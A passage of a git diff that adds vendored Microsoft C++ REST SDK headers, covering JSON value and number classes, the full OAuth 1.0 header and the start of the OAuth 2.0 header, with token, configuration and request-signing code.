static_cast(m_intval); + } + + /// + /// Converts the JSON number to unsigned int64. + /// + /// An unsigned int64 representation of the number + uint64_t to_uint64() const + { + if (m_type == double_type) + return static_cast(m_value); + else + return static_cast(m_intval); + } + + /// + /// Is the number represented internally as an integral type? + /// + /// true if the number is represented as an integral type, false otherwise + bool is_integral() const { return m_type != double_type; } + + /// + /// Compares two JSON numbers for equality. + /// + /// The JSON number to compare with. + /// True if the numbers are equal. + bool operator==(const number& other) const + { + if (m_type != other.m_type) return false; + + switch (m_type) + { + case json::number::type::signed_type: return m_intval == other.m_intval; + case json::number::type::unsigned_type: return m_uintval == other.m_uintval; + case json::number::type::double_type: return m_value == other.m_value; + } + __assume(0); + // Absence of this return statement provokes a warning from Intel + // compiler, but its presence results in a warning from MSVC, so + // we have to resort to conditional compilation to keep both happy. +#ifdef __INTEL_COMPILER + return false; +#endif + } + +private: + union { + int64_t m_intval; + uint64_t m_uintval; + double m_value; + }; + + enum type + { + signed_type = 0, + unsigned_type, + double_type + } m_type; + + friend class details::_Number; +}; + +namespace details +{ +class _Value +{ +public: + virtual std::unique_ptr<_Value> _copy_value() = 0; + + virtual bool has_field(const utility::string_t&) const { return false; } + virtual value get_field(const utility::string_t&) const { throw json_exception("not an object"); } + virtual value get_element(array::size_type) const { throw json_exception("not an array"); } + + virtual value& index(const utility::string_t&) { throw json_exception("not an object"); } + virtual value& index(array::size_type) { throw json_exception("not an array"); } + + virtual const value& cnst_index(const utility::string_t&) const { throw json_exception("not an object"); } + virtual const value& cnst_index(array::size_type) const { throw json_exception("not an array"); } + + // Common function used for serialization to strings and streams. + virtual void serialize_impl(std::string& str) const { format(str); } +#ifdef _WIN32 + virtual void serialize_impl(std::wstring& str) const { format(str); } +#endif + + virtual utility::string_t to_string() const + { + utility::string_t str; + serialize_impl(str); + return str; + } + + virtual json::value::value_type type() const { return json::value::Null; } + + virtual bool is_integer() const { throw json_exception("not a number"); } + virtual bool is_double() const { throw json_exception("not a number"); } + + virtual const json::number& as_number() { throw json_exception("not a number"); } + virtual double as_double() const { throw json_exception("not a number"); } + virtual int as_integer() const { throw json_exception("not a number"); } + virtual bool as_bool() const { throw json_exception("not a boolean"); } + virtual json::array& as_array() { throw json_exception("not an array"); } + virtual const json::array& as_array() const { throw json_exception("not an array"); } + virtual json::object& as_object() { throw json_exception("not an object"); } + virtual const json::object& as_object() const { throw json_exception("not an object"); } + virtual const utility::string_t& as_string() const { throw json_exception("not a string"); } + + virtual size_t size() const { return 0; } + + virtual ~_Value() {} + +protected: + _Value() {} + + virtual void format(std::basic_string& stream) const { stream.append("null"); } +#ifdef _WIN32 + virtual void format(std::basic_string& stream) const { stream.append(L"null"); } +#endif +private: + friend class web::json::value; +}; + +class _Null : public _Value +{ +public: + virtual std::unique_ptr<_Value> _copy_value() { return utility::details::make_unique<_Null>(); } + virtual json::value::value_type type() const { return json::value::Null; } +}; + +class _Number : public _Value +{ +public: + _Number(double value) : m_number(value) {} + _Number(int32_t value) : m_number(value) {} + _Number(uint32_t value) : m_number(value) {} + _Number(int64_t value) : m_number(value) {} + _Number(uint64_t value) : m_number(value) {} + + virtual std::unique_ptr<_Value> _copy_value() { return utility::details::make_unique<_Number>(*this); } + + virtual json::value::value_type type() const { return json::value::Number; } + + virtual bool is_integer() const { return m_number.is_integral(); } + virtual bool is_double() const { return !m_number.is_integral(); } + + virtual double as_double() const { return m_number.to_double(); } + + virtual int as_integer() const { return m_number.to_int32(); } + + virtual const number& as_number() { return m_number; } + +protected: + virtual void format(std::basic_string& stream) const; +#ifdef _WIN32 + virtual void format(std::basic_string& stream) const; +#endif +private: + template + friend class json::details::JSON_Parser; + + json::number m_number; +}; + +class _Boolean : public _Value +{ +public: + _Boolean(bool value) : m_value(value) {} + + virtual std::unique_ptr<_Value> _copy_value() { return utility::details::make_unique<_Boolean>(*this); } + + virtual json::value::value_type type() const { return json::value::Boolean; } + + virtual bool as_bool() const { return m_value; } + +protected: + virtual void format(std::basic_string& stream) const { stream.append(m_value ? "true" : "false"); } + +#ifdef _WIN32 + virtual void format(std::basic_string& stream) const { stream.append(m_value ? L"true" : L"false"); } +#endif +private: + template + friend class json::details::JSON_Parser; + bool m_value; +}; + +class _String : public _Value +{ +public: + _String(utility::string_t value) : m_string(std::move(value)) { m_has_escape_char = has_escape_chars(*this); } + _String(utility::string_t value, bool escaped_chars) : m_string(std::move(value)), m_has_escape_char(escaped_chars) + { + } + +#ifdef _WIN32 + _String(std::string&& value) : m_string(utility::conversions::to_utf16string(std::move(value))) + { + m_has_escape_char = has_escape_chars(*this); + } + _String(std::string&& value, bool escape_chars) + : m_string(utility::conversions::to_utf16string(std::move(value))), m_has_escape_char(escape_chars) + { + } +#endif + + virtual std::unique_ptr<_Value> _copy_value() { return utility::details::make_unique<_String>(*this); } + + virtual json::value::value_type type() const { return json::value::String; } + + virtual const utility::string_t& as_string() const; + + virtual void serialize_impl(std::string& str) const { serialize_impl_char_type(str); } +#ifdef _WIN32 + virtual void serialize_impl(std::wstring& str) const { serialize_impl_char_type(str); } +#endif + +protected: + virtual void format(std::basic_string& str) const; +#ifdef _WIN32 + virtual void format(std::basic_string& str) const; +#endif + +private: + friend class _Object; + friend class _Array; + + size_t get_reserve_size() const { return m_string.size() + 2; } + + template + void serialize_impl_char_type(std::basic_string& str) const + { + // To avoid repeated allocations reserve some space all up front. + // size of string + 2 for quotes + str.reserve(get_reserve_size()); + format(str); + } + + std::string as_utf8_string() const; + utf16string as_utf16_string() const; + + utility::string_t m_string; + + // There are significant performance gains that can be made by knowing whether + // or not a character that requires escaping is present. + bool m_has_escape_char; + static bool has_escape_chars(const _String& str); +}; + +template +_ASYNCRTIMP void append_escape_string(std::basic_string& str, const std::basic_string& escaped); + +void format_string(const utility::string_t& key, utility::string_t& str); + +#ifdef _WIN32 +void format_string(const utility::string_t& key, std::string& str); +#endif + +class _Object : public _Value +{ +public: + _Object(bool keep_order) : m_object(keep_order) {} + _Object(object::storage_type fields, bool keep_order) : m_object(std::move(fields), keep_order) {} + + virtual std::unique_ptr<_Value> _copy_value() { return utility::details::make_unique<_Object>(*this); } + + virtual json::object& as_object() { return m_object; } + + virtual const json::object& as_object() const { return m_object; } + + virtual json::value::value_type type() const { return json::value::Object; } + + virtual bool has_field(const utility::string_t&) const; + + virtual json::value& index(const utility::string_t& key); + + bool is_equal(const _Object* other) const + { + if (m_object.size() != other->m_object.size()) return false; + + return std::equal(std::begin(m_object), std::end(m_object), std::begin(other->m_object)); + } + + virtual void serialize_impl(std::string& str) const + { + // To avoid repeated allocations reserve some space all up front. + str.reserve(get_reserve_size()); + format(str); + } +#ifdef _WIN32 + virtual void serialize_impl(std::wstring& str) const + { + // To avoid repeated allocations reserve some space all up front. + str.reserve(get_reserve_size()); + format(str); + } +#endif + size_t size() const { return m_object.size(); } + +protected: + virtual void format(std::basic_string& str) const { format_impl(str); } +#ifdef _WIN32 + virtual void format(std::basic_string& str) const { format_impl(str); } +#endif + +private: + json::object m_object; + + template + friend class json::details::JSON_Parser; + + template + void format_impl(std::basic_string& str) const + { + str.push_back('{'); + if (!m_object.empty()) + { + auto lastElement = m_object.end() - 1; + for (auto iter = m_object.begin(); iter != lastElement; ++iter) + { + format_string(iter->first, str); + str.push_back(':'); + iter->second.format(str); + str.push_back(','); + } + format_string(lastElement->first, str); + str.push_back(':'); + lastElement->second.format(str); + } + str.push_back('}'); + } + + size_t get_reserve_size() const + { + // This is a heuristic we can tune more in the future: + // Basically size of string plus + // sum size of value if an object, array, or string. + size_t reserveSize = 2; // For brackets {} + for (auto iter = m_object.begin(); iter != m_object.end(); ++iter) + { + reserveSize += iter->first.length() + 2; // 2 for quotes + size_t valueSize = iter->second.size() * 20; // Multiply by each object/array element + if (valueSize == 0) + { + if (iter->second.type() == json::value::String) + { + valueSize = static_cast<_String*>(iter->second.m_value.get())->get_reserve_size(); + } + else + { + valueSize = 5; // true, false, or null + } + } + reserveSize += valueSize; + } + return reserveSize; + } +}; + +class _Array : public _Value +{ +public: + _Array() {} + _Array(array::size_type size) : m_array(size) {} + _Array(array::storage_type elements) : m_array(std::move(elements)) {} + + virtual std::unique_ptr<_Value> _copy_value() { return utility::details::make_unique<_Array>(*this); } + + virtual json::value::value_type type() const { return json::value::Array; } + + virtual json::array& as_array() { return m_array; } + virtual const json::array& as_array() const { return m_array; } + + virtual json::value& index(json::array::size_type index) { return m_array[index]; } + + bool is_equal(const _Array* other) const + { + if (m_array.size() != other->m_array.size()) return false; + + auto iterT = m_array.cbegin(); + auto iterO = other->m_array.cbegin(); + auto iterTe = m_array.cend(); + auto iterOe = other->m_array.cend(); + + for (; iterT != iterTe && iterO != iterOe; ++iterT, ++iterO) + { + if (*iterT != *iterO) return false; + } + + return true; + } + + virtual void serialize_impl(std::string& str) const + { + // To avoid repeated allocations reserve some space all up front. + str.reserve(get_reserve_size()); + format(str); + } +#ifdef _WIN32 + virtual void serialize_impl(std::wstring& str) const + { + // To avoid repeated allocations reserve some space all up front. + str.reserve(get_reserve_size()); + format(str); + } +#endif + size_t size() const { return m_array.size(); } + +protected: + virtual void format(std::basic_string& str) const { format_impl(str); } +#ifdef _WIN32 + virtual void format(std::basic_string& str) const { format_impl(str); } +#endif +private: + json::array m_array; + + template + friend class json::details::JSON_Parser; + + template + void format_impl(std::basic_string& str) const + { + str.push_back('['); + if (!m_array.m_elements.empty()) + { + auto lastElement = m_array.m_elements.end() - 1; + for (auto iter = m_array.m_elements.begin(); iter != lastElement; ++iter) + { + iter->format(str); + str.push_back(','); + } + lastElement->format(str); + } + str.push_back(']'); + } + + size_t get_reserve_size() const + { + // This is a heuristic we can tune more in the future: + // Basically sum size of each value if an object, array, or string by a multiplier. + size_t reserveSize = 2; // For brackets [] + for (auto iter = m_array.cbegin(); iter != m_array.cend(); ++iter) + { + size_t valueSize = iter->size() * 20; // Per each nested array/object + + if (valueSize == 0) valueSize = 5; // true, false, or null + + reserveSize += valueSize; + } + return reserveSize; + } +}; +} // namespace details + +/// +/// Gets the number of children of the value. +/// +/// The number of children. 0 for all non-composites. +inline size_t json::value::size() const { return m_value->size(); } + +/// +/// Test for the presence of a field. +/// +/// The name of the field +/// True if the field exists, false otherwise. +inline bool json::value::has_field(const utility::string_t& key) const { return m_value->has_field(key); } + +/// +/// Access a field of a JSON object. +/// +/// The name of the field +/// The value kept in the field; null if the field does not exist +inline json::value json::value::get(const utility::string_t& key) const { return m_value->get_field(key); } + +/// +/// Access an element of a JSON array. +/// +/// The index of an element in the JSON array +/// The value kept at the array index; null if outside the boundaries of the array +inline json::value json::value::get(size_t index) const { return m_value->get_element(index); } + +/// +/// A standard std::ostream operator to facilitate writing JSON values to streams. +/// +/// The output stream to write the JSON value to. +/// The JSON value to be written to the stream. +/// The output stream object +_ASYNCRTIMP utility::ostream_t& __cdecl operator<<(utility::ostream_t& os, const json::value& val); + +/// +/// A standard std::istream operator to facilitate reading JSON values from streams. +/// +/// The input stream to read the JSON value from. +/// The JSON value object read from the stream. +/// The input stream object. +_ASYNCRTIMP utility::istream_t& __cdecl operator>>(utility::istream_t& is, json::value& val); +} // namespace json +} // namespace web + +#endif diff --git a/Src/Common/CppRestSdk/include/cpprest/oauth1.h b/Src/Common/CppRestSdk/include/cpprest/oauth1.h new file mode 100644 index 0000000..276121f --- /dev/null +++ b/Src/Common/CppRestSdk/include/cpprest/oauth1.h @@ -0,0 +1,576 @@ +/*** + * Copyright (C) Microsoft. All rights reserved. + * Licensed under the MIT license. See LICENSE.txt file in the project root for full license information. + * + * =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ + * + * HTTP Library: Oauth 1.0 + * + * For the latest on this and related APIs, please see: https://github.com/Microsoft/cpprestsdk + * + * =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + ****/ +#pragma once + +#ifndef CASA_OAUTH1_H +#define CASA_OAUTH1_H + +#include "Common/CppRestSdk/include/cpprest/details/web_utilities.h" +#include "Common/CppRestSdk/include/cpprest/http_msg.h" + +namespace web +{ +namespace http +{ +namespace client +{ +// Forward declaration to avoid circular include dependency. +class http_client_config; +} // namespace client + +/// oAuth 1.0 library. +namespace oauth1 +{ +namespace details +{ +class oauth1_handler; + +// State currently used by oauth1_config to authenticate request. +// The state varies for every request (due to timestamp and nonce). +// The state also contains extra transmitted protocol parameters during +// authorization flow (i.e. 'oauth_callback' or 'oauth_verifier'). +class oauth1_state +{ +public: + oauth1_state(utility::string_t timestamp, + utility::string_t nonce, + utility::string_t extra_key = utility::string_t(), + utility::string_t extra_value = utility::string_t()) + : m_timestamp(std::move(timestamp)) + , m_nonce(std::move(nonce)) + , m_extra_key(std::move(extra_key)) + , m_extra_value(std::move(extra_value)) + { + } + + const utility::string_t& timestamp() const { return m_timestamp; } + void set_timestamp(utility::string_t timestamp) { m_timestamp = std::move(timestamp); } + + const utility::string_t& nonce() const { return m_nonce; } + void set_nonce(utility::string_t nonce) { m_nonce = std::move(nonce); } + + const utility::string_t& extra_key() const { return m_extra_key; } + void set_extra_key(utility::string_t key) { m_extra_key = std::move(key); } + + const utility::string_t& extra_value() const { return m_extra_value; } + void set_extra_value(utility::string_t value) { m_extra_value = std::move(value); } + +private: + utility::string_t m_timestamp; + utility::string_t m_nonce; + utility::string_t m_extra_key; + utility::string_t m_extra_value; +}; + +// Constant strings for OAuth 1.0. +typedef utility::string_t oauth1_string; +class oauth1_strings +{ +public: +#define _OAUTH1_STRINGS +#define DAT(a_, b_) _ASYNCRTIMP static const oauth1_string a_; +#include "Common/CppRestSdk/include/cpprest/details/http_constants.dat" +#undef _OAUTH1_STRINGS +#undef DAT +}; + +} // namespace details + +/// oAuth functionality is currently in beta. +namespace experimental +{ +/// +/// Constant strings for OAuth 1.0 signature methods. +/// +typedef utility::string_t oauth1_method; +class oauth1_methods +{ +public: +#define _OAUTH1_METHODS +#define DAT(a, b) _ASYNCRTIMP static const oauth1_method a; +#include "Common/CppRestSdk/include/cpprest/details/http_constants.dat" +#undef _OAUTH1_METHODS +#undef DAT +}; + +/// +/// Exception type for OAuth 1.0 errors. +/// +class oauth1_exception : public std::exception +{ +public: + oauth1_exception(utility::string_t msg) : m_msg(utility::conversions::to_utf8string(std::move(msg))) {} + ~oauth1_exception() CPPREST_NOEXCEPT {} + const char* what() const CPPREST_NOEXCEPT { return m_msg.c_str(); } + +private: + std::string m_msg; +}; + +/// +/// OAuth 1.0 token and associated information. +/// +class oauth1_token +{ +public: + /// + /// Constructs an initially empty invalid access token. + /// + oauth1_token() {} + + /// + /// Constructs a OAuth1 token from a given access token and secret. + /// + /// Access token string. + /// Token secret string. + oauth1_token(utility::string_t access_token, utility::string_t secret) + : m_token(std::move(access_token)), m_secret(std::move(secret)) + { + } + + /// + /// Get access token validity state. + /// If true, token is a valid access token. + /// + /// Access token validity state of the token. + bool is_valid_access_token() const { return !(access_token().empty() || secret().empty()); } + + /// + /// Get access token. + /// + /// The access token string. + const utility::string_t& access_token() const { return m_token; } + + /// + /// Set access token. + /// + /// Access token string to set. + void set_access_token(utility::string_t&& access_token) { m_token = std::move(access_token); } + + /// + /// Set access token. + /// + /// Access token string to set. + void set_access_token(const utility::string_t& access_token) { m_token = access_token; } + + /// + /// Get token secret. + /// + /// Token secret string. + const utility::string_t& secret() const { return m_secret; } + + /// + /// Set token secret. + /// + /// Token secret string to set. + void set_secret(utility::string_t&& secret) { m_secret = std::move(secret); } + + /// + /// Set token secret. + /// + /// Token secret string to set. + void set_secret(const utility::string_t& secret) { m_secret = secret; } + + /// + /// Retrieves any additional parameters. + /// + /// A map containing the additional parameters. + const std::map& additional_parameters() const + { + return m_additional_parameters; + } + + /// + /// Sets a specific parameter additional parameter. + /// + /// Parameter name. + /// Parameter value. + void set_additional_parameter(utility::string_t&& paramName, utility::string_t&& paramValue) + { + m_additional_parameters[std::move(paramName)] = std::move(paramValue); + } + + /// + /// Sets a specific parameter additional parameter. + /// + /// Parameter name. + /// Parameter value. + void set_additional_parameter(const utility::string_t& paramName, const utility::string_t& paramValue) + { + m_additional_parameters[paramName] = paramValue; + } + + /// + /// Clears all additional parameters. + /// + void clear_additional_parameters() { m_additional_parameters.clear(); } + +private: + friend class oauth1_config; + + utility::string_t m_token; + utility::string_t m_secret; + std::map m_additional_parameters; +}; + +/// +/// OAuth 1.0 configuration class. +/// +class oauth1_config +{ +public: + oauth1_config(utility::string_t consumer_key, + utility::string_t consumer_secret, + utility::string_t temp_endpoint, + utility::string_t auth_endpoint, + utility::string_t token_endpoint, + utility::string_t callback_uri, + oauth1_method method, + utility::string_t realm = utility::string_t()) + : m_consumer_key(std::move(consumer_key)) + , m_consumer_secret(std::move(consumer_secret)) + , m_temp_endpoint(std::move(temp_endpoint)) + , m_auth_endpoint(std::move(auth_endpoint)) + , m_token_endpoint(std::move(token_endpoint)) + , m_callback_uri(std::move(callback_uri)) + , m_realm(std::move(realm)) + , m_method(std::move(method)) + , m_is_authorization_completed(false) + { + } + + /// + /// Builds an authorization URI to be loaded in a web browser/view. + /// The URI is built with auth_endpoint() as basis. + /// The method creates a task for HTTP request to first obtain a + /// temporary token. The authorization URI build based on this token. + /// + /// Authorization URI to be loaded in a web browser/view. + _ASYNCRTIMP pplx::task build_authorization_uri(); + + /// + /// Fetch an access token based on redirected URI. + /// The URI is expected to contain 'oauth_verifier' + /// parameter, which is then used to fetch an access token using the + /// token_from_verifier() method. + /// See: http://tools.ietf.org/html/rfc5849#section-2.2 + /// The received 'oauth_token' is parsed and verified to match the current token(). + /// When access token is successfully obtained, set_token() is called, and config is + /// ready for use by oauth1_handler. + /// + /// The URI where web browser/view was redirected after resource owner's + /// authorization. Task that fetches the access token based on redirected URI. + _ASYNCRTIMP pplx::task token_from_redirected_uri(const web::http::uri& redirected_uri); + + /// + /// Creates a task with HTTP request to fetch an access token from the token endpoint. + /// The request exchanges a verifier code to an access token. + /// If successful, the resulting token is set as active via set_token(). + /// See: http://tools.ietf.org/html/rfc5849#section-2.3 + /// + /// Verifier received via redirect upon successful authorization. + /// Task that fetches the access token based on the verifier. + pplx::task token_from_verifier(utility::string_t verifier) + { + return _request_token(_generate_auth_state(details::oauth1_strings::verifier, std::move(verifier)), false); + } + + /// + /// Creates a task with HTTP request to fetch an access token from the token endpoint. + /// If successful, the resulting token is set as active via set_token(). + /// + /// Task that fetches the access token based on the verifier. + pplx::task refresh_token(const utility::string_t& key) + { + return _request_token(_generate_auth_state(key, m_token.additional_parameters().at(key)), false); + } + + /// + /// Get consumer key used in authorization and authentication. + /// + /// Consumer key string. + const utility::string_t& consumer_key() const { return m_consumer_key; } + /// + /// Set consumer key used in authorization and authentication. + /// + /// Consumer key string to set. + void set_consumer_key(utility::string_t key) { m_consumer_key = std::move(key); } + + /// + /// Get consumer secret used in authorization and authentication. + /// + /// Consumer secret string. + const utility::string_t& consumer_secret() const { return m_consumer_secret; } + /// + /// Set consumer secret used in authorization and authentication. + /// + /// Consumer secret string to set. + void set_consumer_secret(utility::string_t secret) { m_consumer_secret = std::move(secret); } + + /// + /// Get temporary token endpoint URI string. + /// + /// Temporary token endpoint URI string. + const utility::string_t& temp_endpoint() const { return m_temp_endpoint; } + /// + /// Set temporary token endpoint URI string. + /// + /// Temporary token endpoint URI string to set. + void set_temp_endpoint(utility::string_t temp_endpoint) { m_temp_endpoint = std::move(temp_endpoint); } + + /// + /// Get authorization endpoint URI string. + /// + /// Authorization endpoint URI string. + const utility::string_t& auth_endpoint() const { return m_auth_endpoint; } + /// + /// Set authorization endpoint URI string. + /// + /// Authorization endpoint URI string to set. + void set_auth_endpoint(utility::string_t auth_endpoint) { m_auth_endpoint = std::move(auth_endpoint); } + + /// + /// Get token endpoint URI string. + /// + /// Token endpoint URI string. + const utility::string_t& token_endpoint() const { return m_token_endpoint; } + /// + /// Set token endpoint URI string. + /// + /// Token endpoint URI string to set. + void set_token_endpoint(utility::string_t token_endpoint) { m_token_endpoint = std::move(token_endpoint); } + + /// + /// Get callback URI string. + /// + /// Callback URI string. + const utility::string_t& callback_uri() const { return m_callback_uri; } + /// + /// Set callback URI string. + /// + /// Callback URI string to set. + void set_callback_uri(utility::string_t callback_uri) { m_callback_uri = std::move(callback_uri); } + + /// + /// Get token. + /// + /// Token. + _ASYNCRTIMP const oauth1_token& token() const; + + /// + /// Set token. + /// + /// Token to set. + void set_token(oauth1_token token) + { + m_token = std::move(token); + m_is_authorization_completed = true; + } + + /// + /// Get signature method. + /// + /// Signature method. + const oauth1_method& method() const { return m_method; } + /// + /// Set signature method. + /// + /// Signature method. + void set_method(oauth1_method method) { m_method = std::move(method); } + + /// + /// Get authentication realm. + /// + /// Authentication realm string. + const utility::string_t& realm() const { return m_realm; } + /// + /// Set authentication realm. + /// + /// Authentication realm string to set. + void set_realm(utility::string_t realm) { m_realm = std::move(realm); } + + /// + /// Returns enabled state of the configuration. + /// The oauth1_handler will perform OAuth 1.0 authentication only if + /// this method returns true. + /// Return value is true if access token is valid (=fetched or manually set) + /// and both consumer_key() and consumer_secret() are set (=non-empty). + /// + /// The configuration enabled state. + bool is_enabled() const + { + return token().is_valid_access_token() && !(consumer_key().empty() || consumer_secret().empty()); + } + + // Builds signature base string according to: + // http://tools.ietf.org/html/rfc5849#section-3.4.1.1 + _ASYNCRTIMP utility::string_t _build_signature_base_string(http_request request, details::oauth1_state state) const; + + // Builds HMAC-SHA1 signature according to: + // http://tools.ietf.org/html/rfc5849#section-3.4.2 + utility::string_t _build_hmac_sha1_signature(http_request request, details::oauth1_state state) const + { + auto text(_build_signature_base_string(std::move(request), std::move(state))); + auto digest(_hmac_sha1(_build_key(), std::move(text))); + auto signature(utility::conversions::to_base64(std::move(digest))); + return signature; + } + + // Builds PLAINTEXT signature according to: + // http://tools.ietf.org/html/rfc5849#section-3.4.4 + utility::string_t _build_plaintext_signature() const { return _build_key(); } + + details::oauth1_state _generate_auth_state(utility::string_t extra_key, utility::string_t extra_value) + { + return details::oauth1_state( + _generate_timestamp(), _generate_nonce(), std::move(extra_key), std::move(extra_value)); + } + + details::oauth1_state _generate_auth_state() + { + return details::oauth1_state(_generate_timestamp(), _generate_nonce()); + } + + /// + /// Gets map of parameters to sign. + /// + /// Map of parameters. + const std::map& parameters() const { return m_parameters_to_sign; } + + /// + /// Adds a key value parameter. + /// + /// Key as a string value. + /// Value as a string value. + void add_parameter(const utility::string_t& key, const utility::string_t& value) + { + m_parameters_to_sign[key] = value; + } + + /// + /// Adds a key value parameter. + /// + /// Key as a string value. + /// Value as a string value. + void add_parameter(utility::string_t&& key, utility::string_t&& value) + { + m_parameters_to_sign[std::move(key)] = std::move(value); + } + + /// + /// Sets entire map or parameters replacing all previously values. + /// + /// Map of values. + void set_parameters(const std::map& parameters) + { + m_parameters_to_sign.clear(); + m_parameters_to_sign = parameters; + } + + /// + /// Clears all parameters. + /// + void clear_parameters() { m_parameters_to_sign.clear(); } + + /// + /// Get the web proxy object + /// + /// A reference to the web proxy object. + const web_proxy& proxy() const { return m_proxy; } + + /// + /// Set the web proxy object that will be used by token_from_code and token_from_refresh + /// + /// A reference to the web proxy object. + void set_proxy(const web_proxy& proxy) { m_proxy = proxy; } + +private: + friend class web::http::client::http_client_config; + friend class web::http::oauth1::details::oauth1_handler; + + oauth1_config() : m_is_authorization_completed(false) {} + + utility::string_t _generate_nonce() { return m_nonce_generator.generate(); } + + static utility::string_t _generate_timestamp() + { + return utility::conversions::details::to_string_t(utility::datetime::utc_timestamp()); + } + + _ASYNCRTIMP static std::vector __cdecl _hmac_sha1(const utility::string_t& key, + const utility::string_t& data); + + static utility::string_t _build_base_string_uri(const uri& u); + + utility::string_t _build_normalized_parameters(web::http::uri u, const details::oauth1_state& state) const; + + utility::string_t _build_signature(http_request request, details::oauth1_state state) const; + + utility::string_t _build_key() const + { + return uri::encode_data_string(consumer_secret()) + _XPLATSTR("&") + uri::encode_data_string(m_token.secret()); + } + + void _authenticate_request(http_request& req) { _authenticate_request(req, _generate_auth_state()); } + + _ASYNCRTIMP void _authenticate_request(http_request& req, details::oauth1_state state); + + _ASYNCRTIMP pplx::task _request_token(details::oauth1_state state, bool is_temp_token_request); + + utility::string_t m_consumer_key; + utility::string_t m_consumer_secret; + oauth1_token m_token; + + utility::string_t m_temp_endpoint; + utility::string_t m_auth_endpoint; + utility::string_t m_token_endpoint; + utility::string_t m_callback_uri; + utility::string_t m_realm; + oauth1_method m_method; + + std::map m_parameters_to_sign; + + web::web_proxy m_proxy; + + utility::nonce_generator m_nonce_generator; + bool m_is_authorization_completed; +}; + +} // namespace experimental + +namespace details +{ +class oauth1_handler : public http_pipeline_stage +{ +public: + oauth1_handler(std::shared_ptr cfg) : m_config(std::move(cfg)) {} + + virtual pplx::task propagate(http_request request) override + { + if (m_config) + { + m_config->_authenticate_request(request); + } + return next_stage()->propagate(request); + } + +private: + std::shared_ptr m_config; +}; + +} // namespace details +} // namespace oauth1 +} // namespace http +} // namespace web + +#endif diff --git a/Src/Common/CppRestSdk/include/cpprest/oauth2.h b/Src/Common/CppRestSdk/include/cpprest/oauth2.h new file mode 100644 index 0000000..acf2351 --- /dev/null +++ b/Src/Common/CppRestSdk/include/cpprest/oauth2.h @@ -0,0 +1,540 @@ +/*** + * Copyright (C) Microsoft. All rights reserved. + * Licensed under the MIT license. See LICENSE.txt file in the project root for full license information. + * + * =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ + * + * HTTP Library: Oauth 2.0 + * + * For the latest on this and related APIs, please see: https://github.com/Microsoft/cpprestsdk + * + * =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + ****/ +#pragma once + +#ifndef CASA_OAUTH2_H +#define CASA_OAUTH2_H + +#include "Common/CppRestSdk/include/cpprest/details/web_utilities.h" +#include "Common/CppRestSdk/include/cpprest/http_msg.h" + +namespace web +{ +namespace http +{ +namespace client +{ +// Forward declaration to avoid circular include dependency. +class http_client_config; +} // namespace client + +/// oAuth 2.0 library. +namespace oauth2 +{ +namespace details +{ +class oauth2_handler; + +// Constant strings for OAuth 2.0. +typedef utility::string_t oauth2_string; +class oauth2_strings +{ +public: +#define _OAUTH2_STRINGS +#define DAT(a_, b_) _ASYNCRTIMP static const oauth2_string a_; +#include "Common/CppRestSdk/include/cpprest/details/http_constants.dat" +#undef _OAUTH2_STRINGS +#undef DAT +}; + +} // namespace details + +/// oAuth functionality is currently in beta. +namespace experimental +{ +/// +/// Exception type for OAuth 2.0 errors. +/// +class oauth2_exception : public std::exception +{ +public: + oauth2_exception(utility::string_t msg) : m_msg(utility::conversions::to_utf8string(std::move(msg))) {} + ~oauth2_exception() CPPREST_NOEXCEPT {} + const char* what() const CPPREST_NOEXCEPT { return m_msg.c_str(); } + +private: + std::string m_msg; +}; + +/// +/// OAuth 2.0 token and associated information. +/// +class oauth2_token +{ +public: + /// + /// Value for undefined expiration time in expires_in(). + /// + enum + { + undefined_expiration = -1 + }; + + oauth2_token(utility::string_t access_token = utility::string_t()) + : m_access_token(std::move(access_token)), m_expires_in(undefined_expiration) + { + } + + /// + /// Get access token validity state. + /// If true, access token is a valid. + /// + /// Access token validity state. + bool is_valid_access_token() const { return !access_token().empty(); } + + /// + /// Get access token. + /// + /// Access token string. + const utility::string_t& access_token() const { return m_access_token; } + /// + /// Set access token. + /// + /// Access token string to set. + void set_access_token(utility::string_t access_token) { m_access_token = std::move(access_token); } + + /// + /// Get refresh token. + /// + /// Refresh token string. + const utility::string_t& refresh_token() const { return m_refresh_token; } + /// + /// Set refresh token. + /// + /// Refresh token string to set. + void set_refresh_token(utility::string_t refresh_token) { m_refresh_token = std::move(refresh_token); } + + /// + /// Get token type. + /// + /// Token type string. + const utility::string_t& token_type() const { return m_token_type; } + /// + /// Set token type. + /// + /// Token type string to set. + void set_token_type(utility::string_t token_type) { m_token_type = std::move(token_type); } + + /// + /// Get token scope. + /// + /// Token scope string. + const utility::string_t& scope() const { return m_scope; } + /// + /// Set token scope. + /// + /// Token scope string to set. + void set_scope(utility::string_t scope) { m_scope = std::move(scope); } + + /// + /// Get the lifetime of the access token in seconds. + /// For example, 3600 means the access token will expire in one hour from + /// the time when access token response was generated by the authorization server. + /// Value of undefined_expiration means expiration time is either + /// unset or that it was not returned by the server with the access token. + /// + /// Lifetime of the access token in seconds or undefined_expiration if not set. + int64_t expires_in() const { return m_expires_in; } + /// + /// Set lifetime of access token (in seconds). + /// + /// Lifetime of access token in seconds. + void set_expires_in(int64_t expires_in) { m_expires_in = expires_in; } + +private: + utility::string_t m_access_token; + utility::string_t m_refresh_token; + utility::string_t m_token_type; + utility::string_t m_scope; + int64_t m_expires_in; +}; + +/// +/// OAuth 2.0 configuration. +/// +/// Encapsulates functionality for: +/// - Authenticating requests with an access token. +/// - Performing the OAuth 2.0 authorization code grant authorization flow. +/// See: http://tools.ietf.org/html/rfc6749#section-4.1 +/// - Performing the OAuth 2.0 implicit grant authorization flow. +/// See: http://tools.ietf.org/html/rfc6749#section-4.2 +/// +/// Performing OAuth 2.0 authorization: +/// 1. Set service and client/app parameters: +/// - Client/app key & secret (as provided by the service). +/// - The service authorization endpoint and token endpoint. +/// - Your client/app redirect URI. +/// - Use set_state() to assign a unique state string for the authorization +/// session (default: ""). +/// - If needed, use 